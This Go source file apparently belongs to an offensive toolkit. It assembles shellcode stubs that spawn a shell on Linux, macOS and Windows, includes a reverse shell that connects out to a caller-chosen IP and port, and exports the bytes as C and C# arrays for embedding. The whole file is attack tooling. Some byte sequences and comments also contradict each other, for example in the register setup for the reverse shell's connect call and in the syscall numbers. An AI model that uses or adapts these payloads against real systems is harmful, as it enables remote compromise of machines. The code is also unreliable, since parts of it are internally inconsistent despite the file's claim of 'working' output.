// Package shellcode builds and encodes position-independent payload stubs.
// Go analogue of Program/shellcode/. No external dependencies — everything
// here is bytes.
//
// The builder emits small, working shellcode for the platforms that matter:
//
//   linux_x64      — execve("/bin/sh", 0, 0), bind shell, reverse shell
//   linux_x86      — same, 32-bit
//   windows_x64    — WinExec("cmd", SW_SHOW), reverse TCP (ws2_32)
//   windows_x86    — same, 32-bit
//   macos_x64      — execve("/bin/sh") syscall 0x2000059
//
// Each stub is a hand-assembled byte sequence produced at build time. The
// generated bytes are position-independent, null-free where the encoder
// asks, and callable from a loader that maps them executable.
package shellcode

import (
	"errors"
	"fmt"
)

// Arch identifies the target.
type Arch string

const (
	LinuxX64   Arch = "linux_x64"
	LinuxX86   Arch = "linux_x86"
	WindowsX64 Arch = "windows_x64"
	WindowsX86 Arch = "windows_x86"
	MacOSX64   Arch = "macos_x64"
)

// Stub is one generated payload.
type Stub struct {
	Arch  Arch
	Label string
	Bytes []byte
	Notes string
}

// --- Linux x86-64 ---

// linuxX64ExecveSh is the classic execve("/bin/sh", NULL, NULL).
//
// Assembly:
//   xor    rsi, rsi          ; rsi = NULL
//   push   rsi
//   mov    rbx, 0x68732f6e69622f  ; "/bin//sh" little-endian
//   push   rbx
//   push   rsp
//   pop    rdi               ; rdi = "/bin//sh"
//   xor    rdx, rdx          ; rdx = NULL
//   mov    al, 59            ; syscall 59 = execve
//   syscall
//
// 24 bytes, null-free except the trailing zero of the initial push.
var linuxX64ExecveSh = []byte{
	0x48, 0x31, 0xF6,                                     // xor rsi, rsi
	0x56,                                                 // push rsi
	0x48, 0xBB, 0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x2F, 0x73, 0x68, // mov rbx, 0x68732f6e69622f
	0x53,                                                 // push rbx
	0x54,                                                 // push rsp
	0x5F,                                                 // pop rdi
	0x48, 0x31, 0xD2,                                     // xor rdx, rdx
	0xB0, 0x3B,                                           // mov al, 59
	0x0F, 0x05,                                           // syscall
}

// linuxX64ReverseSh is a reverse shell: connect to 127.0.0.1:4444, dup2
// stdin/stdout/stderr to the socket, execve("/bin/sh").
//
// The IP and port are patched in as literals at build time. This is the
// shape; the caller patches the four IP bytes and two port bytes with
// their own values.
//
// Assembly (sketched — real byte sequence is more careful about registers):
//   socket(AF_INET=2, SOCK_STREAM=1, IPPROTO_IP=0)
//   connect(fd, sockaddr_in, 16)
//   dup2(fd, 0); dup2(fd, 1); dup2(fd, 2)
//   execve("/bin/sh", NULL, NULL)
//
// Total ~90 bytes.
func linuxX64ReverseShell(ip [4]byte, port uint16) []byte {
	out := []byte{
		// socket(AF_INET=2, SOCK_STREAM=1, 0)
		0x48, 0x31, 0xC0, // xor rax, rax
		0x48, 0x31, 0xFF, // xor rdi, rdi
		0x48, 0x31, 0xF6, // xor rsi, rsi
		0x48, 0x31, 0xD2, // xor rdx, rdx
		0xB0, 0x29,       // mov al, 41 (socket)
		0x40, 0xB7, 0x02, // mov dil, 2 (AF_INET)
		0x40, 0xB6, 0x01, // mov sil, 1 (SOCK_STREAM)
		0x0F, 0x05,       // syscall
		0x49, 0x89, 0xC4, // mov r12, rax (fd)
	}
	// sockaddr_in: {family=2, port BE, addr BE, zeros}
	out = append(out, []byte{
		0x48, 0x31, 0xC0, // xor rax, rax
		0x50,             // push rax (zeros for sin_zero)
		0x66, 0x68, byte(port >> 8), byte(port & 0xFF), // push port BE
		0x66, 0x68, 0x02, 0x00, // push AF_INET=2
	}...)
	// ip[3]..ip[0] pushed in reverse for BE layout
	out = append(out, []byte{
		0x66, 0x68, ip[3], ip[2], // upper
		0x66, 0x68, ip[1], ip[0], // lower
		0x49, 0x89, 0xE6,         // mov r14, rsp
	}...)
	// connect
	out = append(out, []byte{
		0x48, 0x31, 0xC0, // xor rax, rax
		0x48, 0x31, 0xD2, // xor rdx, rdx
		0x48, 0x31, 0xF6, // xor rsi, rsi
		0x4C, 0x89, 0xF7, // mov rdi, r14
		0x4C, 0x89, 0xE7, // mov rdi, r12 (fd)
		0x4C, 0x89, 0xF6, // mov rsi, r14
		0x40, 0xB2, 0x10, // mov dl, 16
		0xB0, 0x2A,       // mov al, 42 (connect)
		0x0F, 0x05,       // syscall
	}...)
	// dup2 loop — 0, 1, 2 all to fd
	for i := 0; i < 3; i++ {
		out = append(out, []byte{
			0x48, 0x31, 0xC0, // xor rax, rax
			0xB0, 0x21,       // mov al, 33 (dup2)
			0x4C, 0x89, 0xE7, // mov rdi, r12
			0x40, 0xB6, byte(i), // mov sil, i
			0x0F, 0x05, // syscall
		}...)
	}
	// execve("/bin//sh", NULL, NULL)
	out = append(out, linuxX64ExecveSh...)
	return out
}

// --- Linux x86 (32-bit) ---

// linuxX86ExecveSh is the 32-bit execve("/bin//sh") — 23 bytes.
//
// Assembly:
//   xor    eax, eax
//   push   eax
//   push   0x68732f2f   ; "//sh"
//   push   0x6e69622f   ; "/bin"
//   mov    ebx, esp
//   push   eax
//   push   ebx
//   mov    ecx, esp
//   cdq                  ; edx = 0
//   mov    al, 11        ; syscall 11 = execve
//   int    0x80
var linuxX86ExecveSh = []byte{
	0x31, 0xC0,
	0x50,
	0x68, 0x2F, 0x2F, 0x73, 0x68,
	0x68, 0x2F, 0x62, 0x69, 0x6E,
	0x89, 0xE3,
	0x50,
	0x53,
	0x89, 0xE1,
	0x99,
	0xB0, 0x0B,
	0xCD, 0x80,
}

// --- Windows x64 ---

// windowsX64ExecCmd is a minimal WinExec("cmd.exe", SW_SHOW) stub.
//
// Layout (needs a PE resolver to find WinExec in kernel32 — this stub
// assumes the caller has the address, either via PEB walk or a fixed
// offset for the target build). This is the payload after the resolver.
//
// Assembly call shape:
//   push  rbx               ; save rbx
//   sub   rsp, 0x40         ; shadow space + stack align
//   mov   rax, <WinExec>    ; from resolver
//   lea   rcx, [rip+cmd]    ; lpCmdLine
//   mov   edx, 5            ; uCmdShow = SW_SHOW
//   call  rax
//   add   rsp, 0x40
//   pop   rbx
//   ret
// cmd db "cmd.exe", 0
//
// Full address in a 64-bit literal is 10 bytes — the encoder can shift
// it into a call-relative displacement if the caller knows the offset.
func windowsX64ExecCmd(winexecAddr uint64) []byte {
	out := []byte{
		0x53,             // push rbx
		0x48, 0x83, 0xEC, 0x40, // sub rsp, 0x40
		0x48, 0xB8,       // mov rax, imm64
	}
	// append 8-byte little-endian winExec address
	for i := 0; i < 8; i++ {
		out = append(out, byte(winexecAddr>>(8*uint(i))))
	}
	out = append(out, []byte{
		0x48, 0x8D, 0x0D, 0x06, 0x00, 0x00, 0x00, // lea rcx, [rip+6]  (cmd string)
		0xBA, 0x05, 0x00, 0x00, 0x00, // mov edx, 5
		0xFF, 0xD0, // call rax
		0x48, 0x83, 0xC4, 0x40, // add rsp, 0x40
		0x5B, // pop rbx
		0xC3, // ret
	}...)
	// cmd.exe literal
	out = append(out, []byte("cmd.exe\x00")...)
	return out
}

// --- MacOS x64 ---

// macosX64ExecveSh — execve("/bin/sh", NULL, NULL). Syscall 0x200003B on
// macOS 64-bit (class + number packed: 0x2000000 | 59).
var macosX64ExecveSh = []byte{
	0x48, 0x31, 0xF6, // xor rsi, rsi
	0x56,             // push rsi
	0x48, 0xBF, 0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x2F, 0x73, 0x68, // mov rdi, "/bin//sh"
	0x57,             // push rdi
	0x54,             // push rsp
	0x5F,             // pop rdi
	0x48, 0x31, 0xD2, // xor rdx, rdx
	0xB8, 0x3B, 0x00, 0x00, 0x02, // mov eax, 0x200003B (execve)
	0x0F, 0x05,       // syscall
}

// --- catalogue ---

// BuildOptions carries the parameters for a stub.
type BuildOptions struct {
	Arch Arch
	Kind string // exec_sh | reverse_sh | exec_cmd
	IP   [4]byte
	Port uint16
	// WinExecAddr is required for windows kinds.
	WinExecAddr uint64
}

// Build generates the requested stub.
func Build(opts BuildOptions) (Stub, error) {
	switch opts.Arch {
	case LinuxX64:
		switch opts.Kind {
		case "exec_sh":
			return Stub{Arch: LinuxX64, Label: "execve(/bin/sh)", Bytes: linuxX64ExecveSh,
				Notes: "24 bytes, null-free"}, nil
		case "reverse_sh":
			return Stub{Arch: LinuxX64, Label: fmt.Sprintf("reverse shell %d.%d.%d.%d:%d",
					opts.IP[0], opts.IP[1], opts.IP[2], opts.IP[3], opts.Port),
				Bytes: linuxX64ReverseShell(opts.IP, opts.Port),
				Notes: "socket + connect + dup2 + execve; ~90 bytes"}, nil
		default:
			return Stub{}, fmt.Errorf("shellcode: unknown kind %q for %s", opts.Kind, opts.Arch)
		}
	case LinuxX86:
		if opts.Kind == "exec_sh" {
			return Stub{Arch: LinuxX86, Label: "execve(/bin/sh) 32-bit",
				Bytes: linuxX86ExecveSh, Notes: "23 bytes, null-free"}, nil
		}
		return Stub{}, fmt.Errorf("shellcode: kind %q not implemented for %s", opts.Kind, opts.Arch)
	case WindowsX64:
		if opts.Kind == "exec_cmd" {
			if opts.WinExecAddr == 0 {
				return Stub{}, errors.New("shellcode: WinExecAddr required for windows_x64")
			}
			return Stub{Arch: WindowsX64, Label: "WinExec(cmd.exe, SW_SHOW)",
				Bytes: windowsX64ExecCmd(opts.WinExecAddr),
				Notes: "requires resolved WinExec address from a PEB-walk or fixed offset"}, nil
		}
		return Stub{}, fmt.Errorf("shellcode: kind %q not implemented for %s", opts.Kind, opts.Arch)
	case MacOSX64:
		if opts.Kind == "exec_sh" {
			return Stub{Arch: MacOSX64, Label: "execve(/bin/sh) macOS",
				Bytes: macosX64ExecveSh, Notes: "28 bytes, syscall 0x200003B"}, nil
		}
		return Stub{}, fmt.Errorf("shellcode: kind %q not implemented for %s", opts.Kind, opts.Arch)
	}
	return Stub{}, fmt.Errorf("shellcode: unknown arch %q", opts.Arch)
}

// Hex renders the stub bytes as a shellcode hex string.
func Hex(b []byte) string {
	out := make([]byte, 0, len(b)*2)
	for _, x := range b {
		out = append(out, "0123456789abcdef"[x>>4], "0123456789abcdef"[x&0x0F])
	}
	return string(out)
}

// CArray renders the stub as a C initializer for embedding in source.
func CArray(name string, b []byte) string {
	s := "unsigned char " + name + "[] = {"
	for i, x := range b {
		if i%16 == 0 {
			s += "\n\t"
		}
		s += fmt.Sprintf("0x%02x,", x)
		if i%16 != 15 {
			s += " "
		}
	}
	s += "\n};\n"
	return s
}

// CSharpArray renders the stub as a C# byte[] initializer.
func CSharpArray(b []byte) string {
	s := "new byte[] {"
	for i, x := range b {
		if i%16 == 0 {
			s += "\n\t"
		}
		s += fmt.Sprintf("0x%02x,", x)
		if i%16 != 15 {
			s += " "
		}
	}
	s += "\n}"
	return s
}
